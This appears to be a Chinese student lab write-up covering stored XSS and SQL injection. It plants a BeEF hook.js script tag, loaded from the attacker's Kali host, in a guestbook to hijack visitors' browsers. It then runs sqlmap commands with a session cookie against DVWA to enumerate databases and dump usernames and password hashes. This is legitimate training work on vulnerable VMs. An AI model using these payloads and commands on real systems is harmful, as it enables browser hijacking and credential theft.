渗透实验 XSS和SQL注入(Lab3.0)

Back~~2023-12-24 8:26

windows server2003IIS搭建

配置2003的虚拟机


1、利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。

2、 Kali使用beef生成恶意代码

cpp 复制代码 
cd /usr/share/beef-xss
cpp 复制代码 
./beef

执行上面两条命令

账户是beef

密码是之前自己设置好的

hook.js里面有自带的恶意代码

3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板

cpp 复制代码 
<script src="http://Kali的IP地址:3000/hook.js"></script>


4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置。

左边就是别人的IP

右边就是可以控制浏览器的转跳,这里我跳的是百度

5、回答问题:实验中XSS攻击属于哪种类型?

存储型

XSS

SQL注入部分:DVWA+SQLmap+Mysql注入实战

实验环境搭建

打开Metasploitable2后,里面有搭建好的DVWA,访问http://Metasploitable的IP/dvwa (可能需要先扫描一下内网的ip,确定Metasploitable2的ip地址)并且把安全等级设置为最低

此时可以断定有SQL注入漏洞

cpp 复制代码 
http://IP地址/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#

2、枚举当前使用的数据库名称和用户名。

cpp 复制代码 
sqlmap语法参数
-u:指定目标URL
--cookie:当前会话的cookies值
-b:获取数据库类型,检查数据库管理系统标识
--current-db:获取当前数据库
--current-user:获取当前数据库使用的用户
--string:当查询可用时用来匹配页面中的字符串
--users:枚举DBMS用户
-password:枚举DBMS用户密码hash
cpp 复制代码 
sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' -b --current-db --current-user

注意你cookie ,还有你的文件路径是否一样

3、枚举数据库用户名和密码

cpp 复制代码 
sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' --users --password

4、枚举数据库

--dbs:枚举当前数据库

cpp 复制代码 
sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' --dbs

5、枚举数据库和指定数据库的数据表

-D 数据库名:指定数据库

--tables:枚举指定数据库的所有表

cpp 复制代码 
sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' -D "dvwa" --tables

6、获取指定数据库和表中所有列的信息

-D:指定的数据库

-T:指定数据库中的数据表

--columns:获取列的信息

cpp 复制代码 
sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' -D "dvwa" -T users --columns

7、枚举指定数据表中的所有用户名与密码,并down到本地。

-C:枚举数据表中的列

cpp 复制代码 
--dump:存储sqlmap -u "http://192.168.209.135/dvwa/vulnerabilities/sqli/?id=11&Submit=Submit#" --cookie='security=low; PHPSESSID=92bf1c4db806d60f770f3a765c43c61f' -D "dvwa" -T users -C "user_id,user,password" --dump
相关推荐
不太可爱的叶某人2 小时前
【学习笔记】MySQL技术内幕InnoDB存储引擎——第5章 索引与算法
笔记·学习·mysql
岁岁岁平安2 小时前
Redis基础学习(五大值数据类型的常用操作命令)
数据库·redis·学习·redis list·redis hash·redis set·redis string
知识分享小能手4 小时前
Vue3 学习教程,从入门到精通,使用 VSCode 开发 Vue3 的详细指南(3)
前端·javascript·vue.js·学习·前端框架·vue·vue3
pay4fun4 小时前
2048-控制台版本
c++·学习
知识分享小能手5 小时前
Bootstrap 5学习教程,从入门到精通,Bootstrap 5 表单验证语法知识点及案例代码(34)
前端·javascript·学习·typescript·bootstrap·html·css3
weixin_418813876 小时前
Python-可视化学习笔记
笔记·python·学习
Haoea!6 小时前
Flink-05学习 接上节,将FlinkJedisPoolConfig 从Kafka写入Redis
学习·flink·kafka
丁满与彭彭7 小时前
嵌入式学习笔记-MCU阶段-DAY01
笔记·单片机·学习
呼啦啦--隔壁老王8 小时前
dexopt学习待整理
学习
无限远的弧光灯8 小时前
c语言学习_函数递归
c语言·开发语言·学习
热门推荐
01KGG转MP3工具|非KGM文件|解密音频02集群聊天服务器---MySQL数据库的建立03Coze扣子平台完整体验和实践(附国内和国际版对比)04免费领50刀!AnyRouter一键解锁Claude最强编程模型05Java学习第十五部分——MyBatis06扣子(coze)实战|我用扣子搭建了一个自动分析小红薯笔记内容的AI应用|详细步骤拆解07RAL-2025 | 触觉助力无人机空中探索!基于柔顺机器人手指的无人机触觉导航08基于odoo17的设计模式详解---单例模式09DeepSeek各版本说明与优缺点分析10vite 插件